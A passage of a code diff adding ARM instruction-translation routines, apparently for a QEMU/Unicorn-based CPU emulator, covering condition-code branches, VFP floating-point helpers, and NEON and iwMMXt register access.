TCGv_ptr tmp; + + switch (op1) { +#define gen_pas_helper(name) glue(gen_helper_,name)(tcg_ctx, a, a, b, tmp) + case 1: + tmp = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_addi_ptr(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUARMState, GE)); + PAS_OP(s) + tcg_temp_free_ptr(tcg_ctx, tmp); + break; + case 5: + tmp = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_addi_ptr(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUARMState, GE)); + PAS_OP(u) + 
tcg_temp_free_ptr(tcg_ctx, tmp); + break; +#undef gen_pas_helper +#define gen_pas_helper(name) glue(gen_helper_,name)(tcg_ctx, a, a, b) + case 2: + PAS_OP(q); + break; + case 3: + PAS_OP(sh); + break; + case 6: + PAS_OP(uq); + break; + case 7: + PAS_OP(uh); + break; +#undef gen_pas_helper + } +} +#undef PAS_OP + +/* For unknown reasons Arm and Thumb-2 use arbitrarily different encodings. */ +#define PAS_OP(pfx) \ + switch (op1) { \ + case 0: gen_pas_helper(glue(pfx,add8)); break; \ + case 1: gen_pas_helper(glue(pfx,add16)); break; \ + case 2: gen_pas_helper(glue(pfx,addsubx)); break; \ + case 4: gen_pas_helper(glue(pfx,sub8)); break; \ + case 5: gen_pas_helper(glue(pfx,sub16)); break; \ + case 6: gen_pas_helper(glue(pfx,subaddx)); break; \ + } +static void gen_thumb2_parallel_addsub(DisasContext *s, int op1, int op2, TCGv_i32 a, TCGv_i32 b) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_ptr tmp; + + switch (op2) { +#define gen_pas_helper(name) glue(gen_helper_,name)(tcg_ctx, a, a, b, tmp) + case 0: + tmp = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_addi_ptr(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUARMState, GE)); + PAS_OP(s) + tcg_temp_free_ptr(tcg_ctx, tmp); + break; + case 4: + tmp = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_addi_ptr(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUARMState, GE)); + PAS_OP(u) + tcg_temp_free_ptr(tcg_ctx, tmp); + break; +#undef gen_pas_helper +#define gen_pas_helper(name) glue(gen_helper_,name)(tcg_ctx, a, a, b) + case 1: + PAS_OP(q); + break; + case 2: + PAS_OP(sh); + break; + case 5: + PAS_OP(uq); + break; + case 6: + PAS_OP(uh); + break; +#undef gen_pas_helper + } +} +#undef PAS_OP + +/* + * generate a conditional branch based on ARM condition code cc. + * This is common between ARM and Aarch64 targets. 
+ */ +void arm_gen_test_cc(TCGContext *tcg_ctx, int cc, int label) +{ + TCGv_i32 tmp; + int inv; + + switch (cc) { + case 0: /* eq: Z */ + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_ZF, 0, label); + break; + case 1: /* ne: !Z */ + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_ZF, 0, label); + break; + case 2: /* cs: C */ + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_CF, 0, label); + break; + case 3: /* cc: !C */ + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_CF, 0, label); + break; + case 4: /* mi: N */ + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_NF, 0, label); + break; + case 5: /* pl: !N */ + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_GE, tcg_ctx->cpu_NF, 0, label); + break; + case 6: /* vs: V */ + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_VF, 0, label); + break; + case 7: /* vc: !V */ + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_GE, tcg_ctx->cpu_VF, 0, label); + break; + case 8: /* hi: C && !Z */ + inv = gen_new_label(tcg_ctx); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_CF, 0, inv); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_ZF, 0, label); + gen_set_label(tcg_ctx, inv); + break; + case 9: /* ls: !C || Z */ + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_CF, 0, label); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_ZF, 0, label); + break; + case 10: /* ge: N == V -> N ^ V == 0 */ + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_xor_i32(tcg_ctx, tmp, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_GE, tmp, 0, label); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 11: /* lt: N != V -> N ^ V != 0 */ + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_xor_i32(tcg_ctx, tmp, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_LT, tmp, 0, label); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 12: /* gt: !Z && N == V */ + inv = gen_new_label(tcg_ctx); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_ZF, 0, inv); + 
tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_xor_i32(tcg_ctx, tmp, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_GE, tmp, 0, label); + tcg_temp_free_i32(tcg_ctx, tmp); + gen_set_label(tcg_ctx, inv); + break; + case 13: /* le: Z || N != V */ + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_ZF, 0, label); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_xor_i32(tcg_ctx, tmp, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_LT, tmp, 0, label); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + default: + /* fprintf(stderr, "Bad condition code 0x%x\n", cc); */ + tmp = tcg_const_i32(tcg_ctx, EXCP_EXCEPTION_EXIT); + gen_helper_exception_internal(tcg_ctx, tcg_ctx->cpu_env, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + } +} + +static const uint8_t table_logic_cc[16] = { + 1, /* and */ + 1, /* xor */ + 0, /* sub */ + 0, /* rsb */ + 0, /* add */ + 0, /* adc */ + 0, /* sbc */ + 0, /* rsc */ + 1, /* andl */ + 1, /* xorl */ + 0, /* cmp */ + 0, /* cmn */ + 1, /* orr */ + 1, /* mov */ + 1, /* bic */ + 1, /* mvn */ +}; + +/* Set PC and Thumb state from an immediate address. */ +static inline void gen_bx_im(DisasContext *s, uint32_t addr) +{ + TCGv_i32 tmp; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + s->is_jmp = DISAS_UPDATE; + if (s->thumb != (addr & 1)) { + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, addr & 1); + tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUARMState, thumb)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[15], addr & ~1); +} + +/* Set PC and Thumb state from var. var is marked as dead. 
*/ +static inline void gen_bx(DisasContext *s, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + s->is_jmp = DISAS_UPDATE; + tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_R[15], var, ~1); + tcg_gen_andi_i32(tcg_ctx, var, var, 1); + store_cpu_field(tcg_ctx, var, thumb); +} + +/* Variant of store_reg which uses branch&exchange logic when storing + to r15 in ARM architecture v7 and above. The source must be a temporary + and will be marked as dead. */ +static inline void store_reg_bx(DisasContext *s, int reg, TCGv_i32 var) +{ + if (reg == 15 && ENABLE_ARCH_7) { + gen_bx(s, var); + } else { + store_reg(s, reg, var); + } +} + +/* Variant of store_reg which uses branch&exchange logic when storing + * to r15 in ARM architecture v5T and above. This is used for storing + * the results of a LDR/LDM/POP into r15, and corresponds to the cases + * in the ARM ARM which use the LoadWritePC() pseudocode function. */ +static inline void store_reg_from_load(DisasContext *s, int reg, TCGv_i32 var) +{ + if (reg == 15 && ENABLE_ARCH_5) { + gen_bx(s, var); + } else { + store_reg(s, reg, var); + } +} + +/* Abstractions of "generate code to do a guest load/store for + * AArch32", where a vaddr is always 32 bits (and is zero + * extended if we're a 64 bit core) and data is also + * 32 bits unless specifically doing a 64 bit access. + * These functions work like tcg_gen_qemu_{ld,st}* except + * that the address argument is TCGv_i32 rather than TCGv. 
+ */ +#if TARGET_LONG_BITS == 32 + +#define DO_GEN_LD(SUFF, OPC) \ +static inline void gen_aa32_ld##SUFF(DisasContext *s, TCGv_i32 val, TCGv_i32 addr, int index) \ +{ \ + tcg_gen_qemu_ld_i32(s->uc, val, addr, index, OPC); \ +} + +#define DO_GEN_ST(SUFF, OPC) \ +static inline void gen_aa32_st##SUFF(DisasContext *s, TCGv_i32 val, TCGv_i32 addr, int index) \ +{ \ + tcg_gen_qemu_st_i32(s->uc, val, addr, index, OPC); \ +} + +static inline void gen_aa32_ld64(DisasContext *s, TCGv_i64 val, TCGv_i32 addr, int index) +{ + tcg_gen_qemu_ld_i64(s->uc, val, addr, index, MO_TEQ); +} + +static inline void gen_aa32_st64(DisasContext *s, TCGv_i64 val, TCGv_i32 addr, int index) +{ + tcg_gen_qemu_st_i64(s->uc, val, addr, index, MO_TEQ); +} + +#else + +#define DO_GEN_LD(SUFF, OPC) \ +static inline void gen_aa32_ld##SUFF(DisasContext *s, TCGv_i32 val, TCGv_i32 addr, int index) \ +{ \ + TCGContext *tcg_ctx = s->uc->tcg_ctx; \ + TCGv addr64 = tcg_temp_new(tcg_ctx); \ + tcg_gen_extu_i32_i64(tcg_ctx, addr64, addr); \ + tcg_gen_qemu_ld_i32(s->uc, val, addr64, index, OPC); \ + tcg_temp_free(tcg_ctx, addr64); \ +} + +#define DO_GEN_ST(SUFF, OPC) \ +static inline void gen_aa32_st##SUFF(DisasContext *s, TCGv_i32 val, TCGv_i32 addr, int index) \ +{ \ + TCGContext *tcg_ctx = s->uc->tcg_ctx; \ + TCGv addr64 = tcg_temp_new(tcg_ctx); \ + tcg_gen_extu_i32_i64(tcg_ctx, addr64, addr); \ + tcg_gen_qemu_st_i32(s->uc, val, addr64, index, OPC); \ + tcg_temp_free(tcg_ctx, addr64); \ +} + +static inline void gen_aa32_ld64(DisasContext *s, TCGv_i64 val, TCGv_i32 addr, int index) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv addr64 = tcg_temp_new(tcg_ctx); + tcg_gen_extu_i32_i64(tcg_ctx, addr64, addr); + tcg_gen_qemu_ld_i64(s->uc, val, addr64, index, MO_TEQ); + tcg_temp_free(tcg_ctx, addr64); +} + +static inline void gen_aa32_st64(DisasContext *s, TCGv_i64 val, TCGv_i32 addr, int index) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv addr64 = tcg_temp_new(tcg_ctx); + tcg_gen_extu_i32_i64(tcg_ctx, addr64, 
addr); + tcg_gen_qemu_st_i64(s->uc, val, addr64, index, MO_TEQ); + tcg_temp_free(tcg_ctx, addr64); +} + +#endif + +DO_GEN_LD(8s, MO_SB) +DO_GEN_LD(8u, MO_UB) +DO_GEN_LD(16s, MO_TESW) +DO_GEN_LD(16u, MO_TEUW) +DO_GEN_LD(32u, MO_TEUL) +DO_GEN_ST(8, MO_UB) +DO_GEN_ST(16, MO_TEUW) +DO_GEN_ST(32, MO_TEUL) + +static inline void gen_set_pc_im(DisasContext *s, target_ulong val) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[15], val); +} + +static inline void gen_hvc(DisasContext *s, int imm16) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* The pre HVC helper handles cases when HVC gets trapped + * as an undefined insn by runtime configuration (ie before + * the insn really executes). + */ + gen_set_pc_im(s, s->pc - 4); + gen_helper_pre_hvc(tcg_ctx, tcg_ctx->cpu_env); + /* Otherwise we will treat this as a real exception which + * happens after execution of the insn. (The distinction matters + * for the PC value reported to the exception handler and also + * for single stepping.) + */ + s->svc_imm = imm16; + gen_set_pc_im(s, s->pc); + s->is_jmp = DISAS_HVC; +} + +static inline void gen_smc(DisasContext *s) +{ + /* As with HVC, we may take an exception either before or after + * the insn executes. 
+ */ + TCGv_i32 tmp; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + gen_set_pc_im(s, s->pc - 4); + tmp = tcg_const_i32(tcg_ctx, syn_aa32_smc()); + gen_helper_pre_smc(tcg_ctx, tcg_ctx->cpu_env, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + gen_set_pc_im(s, s->pc); + s->is_jmp = DISAS_SMC; +} + +static inline void +gen_set_condexec (DisasContext *s) +{ + if (s->condexec_mask) { + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint32_t val = (s->condexec_cond << 4) | (s->condexec_mask >> 1); + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, val); + store_cpu_field(tcg_ctx, tmp, condexec_bits); + } +} + +static void gen_exception_internal_insn(DisasContext *s, int offset, int excp) +{ + gen_set_condexec(s); + gen_set_pc_im(s, s->pc - offset); + gen_exception_internal(s, excp); + s->is_jmp = DISAS_JUMP; +} + +static void gen_exception_insn(DisasContext *s, int offset, int excp, int syn) +{ + gen_set_condexec(s); + gen_set_pc_im(s, s->pc - offset); + gen_exception(s, excp, syn); // qq + s->is_jmp = DISAS_JUMP; +} + +/* Force a TB lookup after an instruction that changes the CPU state. 
*/ +static inline void gen_lookup_tb(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[15], s->pc & ~1); + s->is_jmp = DISAS_UPDATE; +} + +static inline void gen_add_data_offset(DisasContext *s, unsigned int insn, + TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int val, rm, shift, shiftop; + TCGv_i32 offset; + + if (!(insn & (1 << 25))) { + /* immediate */ + val = insn & 0xfff; + if (!(insn & (1 << 23))) + val = -val; + if (val != 0) + tcg_gen_addi_i32(tcg_ctx, var, var, val); + } else { + /* shift/register */ + rm = (insn) & 0xf; + shift = (insn >> 7) & 0x1f; + shiftop = (insn >> 5) & 3; + offset = load_reg(s, rm); + gen_arm_shift_im(s, offset, shiftop, shift, 0); + if (!(insn & (1 << 23))) + tcg_gen_sub_i32(tcg_ctx, var, var, offset); + else + tcg_gen_add_i32(tcg_ctx, var, var, offset); + tcg_temp_free_i32(tcg_ctx, offset); + } +} + +static inline void gen_add_datah_offset(DisasContext *s, unsigned int insn, + int extra, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int val, rm; + TCGv_i32 offset; + + if (insn & (1 << 22)) { + /* immediate */ + val = (insn & 0xf) | ((insn >> 4) & 0xf0); + if (!(insn & (1 << 23))) + val = -val; + val += extra; + if (val != 0) + tcg_gen_addi_i32(tcg_ctx, var, var, val); + } else { + /* register */ + if (extra) + tcg_gen_addi_i32(tcg_ctx, var, var, extra); + rm = (insn) & 0xf; + offset = load_reg(s, rm); + if (!(insn & (1 << 23))) + tcg_gen_sub_i32(tcg_ctx, var, var, offset); + else + tcg_gen_add_i32(tcg_ctx, var, var, offset); + tcg_temp_free_i32(tcg_ctx, offset); + } +} + +static TCGv_ptr get_fpstatus_ptr(DisasContext *s, int neon) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_ptr statusptr = tcg_temp_new_ptr(tcg_ctx); + int offset; + if (neon) { + offset = offsetof(CPUARMState, vfp.standard_fp_status); + } else { + offset = offsetof(CPUARMState, vfp.fp_status); + } + tcg_gen_addi_ptr(tcg_ctx, statusptr, tcg_ctx->cpu_env, offset); + return 
statusptr; +} + +#define VFP_OP2(name) \ +static inline void gen_vfp_##name(DisasContext *s, int dp) \ +{ \ + TCGContext *tcg_ctx = s->uc->tcg_ctx; \ + TCGv_ptr fpst = get_fpstatus_ptr(s, 0); \ + if (dp) { \ + gen_helper_vfp_##name##d(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F1d, fpst); \ + } else { \ + gen_helper_vfp_##name##s(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F1s, fpst); \ + } \ + tcg_temp_free_ptr(tcg_ctx, fpst); \ +} + +VFP_OP2(add) +VFP_OP2(sub) +VFP_OP2(mul) +VFP_OP2(div) + +#undef VFP_OP2 + +static inline void gen_vfp_F1_mul(DisasContext *s, int dp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* Like gen_vfp_mul() but put result in F1 */ + TCGv_ptr fpst = get_fpstatus_ptr(s, 0); + if (dp) { + gen_helper_vfp_muld(tcg_ctx, tcg_ctx->cpu_F1d, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F1d, fpst); + } else { + gen_helper_vfp_muls(tcg_ctx, tcg_ctx->cpu_F1s, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F1s, fpst); + } + tcg_temp_free_ptr(tcg_ctx, fpst); +} + +static inline void gen_vfp_F1_neg(DisasContext *s, int dp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* Like gen_vfp_neg() but put result in F1 */ + if (dp) { + gen_helper_vfp_negd(tcg_ctx, tcg_ctx->cpu_F1d, tcg_ctx->cpu_F0d); + } else { + gen_helper_vfp_negs(tcg_ctx, tcg_ctx->cpu_F1s, tcg_ctx->cpu_F0s); + } +} + +static inline void gen_vfp_abs(DisasContext *s, int dp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (dp) + gen_helper_vfp_absd(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0d); + else + gen_helper_vfp_abss(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s); +} + +static inline void gen_vfp_neg(DisasContext *s, int dp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (dp) + gen_helper_vfp_negd(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0d); + else + gen_helper_vfp_negs(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s); +} + +static inline void gen_vfp_sqrt(DisasContext *s, int dp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (dp) + gen_helper_vfp_sqrtd(tcg_ctx, tcg_ctx->cpu_F0d, 
tcg_ctx->cpu_F0d, tcg_ctx->cpu_env); + else + gen_helper_vfp_sqrts(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env); +} + +static inline void gen_vfp_cmp(DisasContext *s, int dp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (dp) + gen_helper_vfp_cmpd(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F1d, tcg_ctx->cpu_env); + else + gen_helper_vfp_cmps(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F1s, tcg_ctx->cpu_env); +} + +static inline void gen_vfp_cmpe(DisasContext *s, int dp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (dp) + gen_helper_vfp_cmped(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F1d, tcg_ctx->cpu_env); + else + gen_helper_vfp_cmpes(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F1s, tcg_ctx->cpu_env); +} + +static inline void gen_vfp_F1_ld0(DisasContext *s, int dp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (dp) + tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_F1d, 0); + else + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_F1s, 0); +} + +#define VFP_GEN_ITOF(name) \ +static inline void gen_vfp_##name(DisasContext *s, int dp, int neon) \ +{ \ + TCGContext *tcg_ctx = s->uc->tcg_ctx; \ + TCGv_ptr statusptr = get_fpstatus_ptr(s, neon); \ + if (dp) { \ + gen_helper_vfp_##name##d(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0s, statusptr); \ + } else { \ + gen_helper_vfp_##name##s(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, statusptr); \ + } \ + tcg_temp_free_ptr(tcg_ctx, statusptr); \ +} + +VFP_GEN_ITOF(uito) +VFP_GEN_ITOF(sito) +#undef VFP_GEN_ITOF + +#define VFP_GEN_FTOI(name) \ +static inline void gen_vfp_##name(DisasContext *s, int dp, int neon) \ +{ \ + TCGContext *tcg_ctx = s->uc->tcg_ctx; \ + TCGv_ptr statusptr = get_fpstatus_ptr(s, neon); \ + if (dp) { \ + gen_helper_vfp_##name##d(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0d, statusptr); \ + } else { \ + gen_helper_vfp_##name##s(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, statusptr); \ + } \ + tcg_temp_free_ptr(tcg_ctx, statusptr); \ +} + +VFP_GEN_FTOI(toui) +VFP_GEN_FTOI(touiz) +VFP_GEN_FTOI(tosi) 
+VFP_GEN_FTOI(tosiz)
+#undef VFP_GEN_FTOI
+
+/* VFP_GEN_FIX(name, round) expands to gen_vfp_<name>(s, dp, shift, neon):
+ * a fixed-point <-> float conversion performed in place on the F0 scratch
+ * (cpu_F0d when dp, else cpu_F0s).  "shift" is passed to the helper as an
+ * immediate operand (the fixed-point position).  "round" is pasted onto
+ * the helper name to select the rounding variant: the to-fixed directions
+ * below use the _round_to_zero helpers, the from-fixed directions the
+ * unsuffixed ones.  "neon" selects which fp_status to use — see
+ * get_fpstatus_ptr().
+ */
+#define VFP_GEN_FIX(name, round) \
+static inline void gen_vfp_##name(DisasContext *s, int dp, int shift, int neon) \
+{ \
+    TCGContext *tcg_ctx = s->uc->tcg_ctx; \
+    TCGv_i32 tmp_shift = tcg_const_i32(tcg_ctx, shift); \
+    TCGv_ptr statusptr = get_fpstatus_ptr(s, neon); \
+    if (dp) { \
+        gen_helper_vfp_##name##d##round(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0d, tmp_shift, \
+                                        statusptr); \
+    } else { \
+        gen_helper_vfp_##name##s##round(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, tmp_shift, \
+                                        statusptr); \
+    } \
+    tcg_temp_free_i32(tcg_ctx, tmp_shift); \
+    tcg_temp_free_ptr(tcg_ctx, statusptr); \
+}
+/* float -> fixed (signed/unsigned half/long): truncating helpers. */
+VFP_GEN_FIX(tosh, _round_to_zero)
+VFP_GEN_FIX(tosl, _round_to_zero)
+VFP_GEN_FIX(touh, _round_to_zero)
+VFP_GEN_FIX(toul, _round_to_zero)
+/* fixed -> float: no rounding-variant suffix. */
+VFP_GEN_FIX(shto, )
+VFP_GEN_FIX(slto, )
+VFP_GEN_FIX(uhto, )
+VFP_GEN_FIX(ulto, )
+#undef VFP_GEN_FIX
+
+/* Load the F0 scratch (64-bit F0d when dp, else 32-bit F0s) from guest
+ * address "addr".
+ */
+static inline void gen_vfp_ld(DisasContext *s, int dp, TCGv_i32 addr)
+{
+    TCGContext *tcg_ctx = s->uc->tcg_ctx;
+    if (dp) {
+        gen_aa32_ld64(s, tcg_ctx->cpu_F0d, addr, get_mem_index(s));
+    } else {
+        gen_aa32_ld32u(s, tcg_ctx->cpu_F0s, addr, get_mem_index(s));
+    }
+}
+
+/* Store the F0 scratch (F0d when dp, else F0s) to guest address "addr". */
+static inline void gen_vfp_st(DisasContext *s, int dp, TCGv_i32 addr)
+{
+    TCGContext *tcg_ctx = s->uc->tcg_ctx;
+    if (dp) {
+        gen_aa32_st64(s, tcg_ctx->cpu_F0d, addr, get_mem_index(s));
+    } else {
+        gen_aa32_st32(s, tcg_ctx->cpu_F0s, addr, get_mem_index(s));
+    }
+}
+
+/* Byte offset of VFP register "reg" inside CPUARMState.  Double-precision
+ * registers index vfp.regs[] directly; two single-precision registers
+ * share one CPU_DoubleU slot, odd-numbered regs in l.upper and
+ * even-numbered regs in l.lower.
+ */
+static inline long
+vfp_reg_offset (int dp, int reg)
+{
+    if (dp)
+        return offsetof(CPUARMState, vfp.regs[reg]);
+    else if (reg & 1) {
+        return offsetof(CPUARMState, vfp.regs[reg >> 1])
+          + offsetof(CPU_DoubleU, l.upper);
+    } else {
+        return offsetof(CPUARMState, vfp.regs[reg >> 1])
+          + offsetof(CPU_DoubleU, l.lower);
+    }
+}
+
+/* Return the offset of a 32-bit piece of a NEON register.
+   zero is the least significant end of the register.  */
+static inline long
+neon_reg_offset (int reg, int n)
+{
+    int sreg;
+    sreg = reg * 2 + n;    /* each D register is two 32-bit pieces */
+    return vfp_reg_offset(0, sreg);
+}
+
+/* Read one 32-bit piece ("pass") of NEON register "reg" into a freshly
+ * allocated temp; the caller owns (and must free) the temp.
+ */
+static TCGv_i32 neon_load_reg(TCGContext *tcg_ctx, int reg, int pass)
+{
+    TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx);
+    tcg_gen_ld_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, neon_reg_offset(reg, pass));
+    return tmp;
+}
+
+/* Write "var" into one 32-bit piece of NEON register "reg".  var is
+ * consumed (freed) here — the caller must not use it afterwards.
+ */
+static void neon_store_reg(TCGContext *tcg_ctx, int reg, int pass, TCGv_i32 var)
+{
+    tcg_gen_st_i32(tcg_ctx, var, tcg_ctx->cpu_env, neon_reg_offset(reg, pass));
+    tcg_temp_free_i32(tcg_ctx, var);
+}
+
+/* Whole-D-register 64-bit load/store; var is caller-owned. */
+static inline void neon_load_reg64(TCGContext *tcg_ctx, TCGv_i64 var, int reg)
+{
+    tcg_gen_ld_i64(tcg_ctx, var, tcg_ctx->cpu_env, vfp_reg_offset(1, reg));
+}
+
+static inline void neon_store_reg64(TCGContext *tcg_ctx, TCGv_i64 var, int reg)
+{
+    tcg_gen_st_i64(tcg_ctx, var, tcg_ctx->cpu_env, vfp_reg_offset(1, reg));
+}
+
+/* Float loads/stores are bit-pattern moves: alias them to the integer
+ * TCG ops of the same width.
+ */
+#define tcg_gen_ld_f32 tcg_gen_ld_i32
+#define tcg_gen_ld_f64 tcg_gen_ld_i64
+#define tcg_gen_st_f32 tcg_gen_st_i32
+#define tcg_gen_st_f64 tcg_gen_st_i64
+
+/* Copy VFP register "reg" into the F0 scratch (F0d/F0s chosen by dp). */
+static inline void gen_mov_F0_vreg(DisasContext *s, int dp, int reg)
+{
+    TCGContext *tcg_ctx = s->uc->tcg_ctx;
+    if (dp)
+        tcg_gen_ld_f64(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_env, vfp_reg_offset(dp, reg));
+    else
+        tcg_gen_ld_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, vfp_reg_offset(dp, reg));
+}
+
+/* Copy VFP register "reg" into the F1 scratch. */
+static inline void gen_mov_F1_vreg(DisasContext *s, int dp, int reg)
+{
+    TCGContext *tcg_ctx = s->uc->tcg_ctx;
+    if (dp)
+        tcg_gen_ld_f64(tcg_ctx, tcg_ctx->cpu_F1d, tcg_ctx->cpu_env, vfp_reg_offset(dp, reg));
+    else
+        tcg_gen_ld_f32(tcg_ctx, tcg_ctx->cpu_F1s, tcg_ctx->cpu_env, vfp_reg_offset(dp, reg));
+}
+
+/* Write the F0 scratch back into VFP register "reg". */
+static inline void gen_mov_vreg_F0(DisasContext *s, int dp, int reg)
+{
+    TCGContext *tcg_ctx = s->uc->tcg_ctx;
+    if (dp)
+        tcg_gen_st_f64(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_env, vfp_reg_offset(dp, reg));
+    else
+        tcg_gen_st_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, vfp_reg_offset(dp, reg));
+}
+
+/* Bit 20 of a coprocessor insn encoding: set for the register-read /
+ * load forms (e.g. TMRRC vs TMCRR in disas_iwmmxt_insn).
+ */
+#define ARM_CP_RW_BIT (1 << 20)
+
+/* Load a 64-bit iwMMXt data register (wRn) from CPUARMState into var. */
+static inline void iwmmxt_load_reg(DisasContext *s, TCGv_i64 var, int reg)
+{
+    TCGContext *tcg_ctx = s->uc->tcg_ctx;
+    tcg_gen_ld_i64(tcg_ctx, var, tcg_ctx->cpu_env, offsetof(CPUARMState, iwmmxt.regs[reg]));
+}
+
+/* Store var back to iwMMXt data register (wRn) in CPUARMState. */
+static inline void iwmmxt_store_reg(DisasContext *s, TCGv_i64 var, int reg)
+{
+    TCGContext *tcg_ctx = s->uc->tcg_ctx;
+    tcg_gen_st_i64(tcg_ctx, var, tcg_ctx->cpu_env, offsetof(CPUARMState, iwmmxt.regs[reg]));
+}
+
+/* Read iwMMXt control register (wCx) "reg" into a freshly allocated
+ * 32-bit temp; the caller owns (and must free) the temp.
+ */
+static inline TCGv_i32 iwmmxt_load_creg(DisasContext *s, int reg)
+{
+    TCGContext *tcg_ctx = s->uc->tcg_ctx;
+    TCGv_i32 var = tcg_temp_new_i32(tcg_ctx);
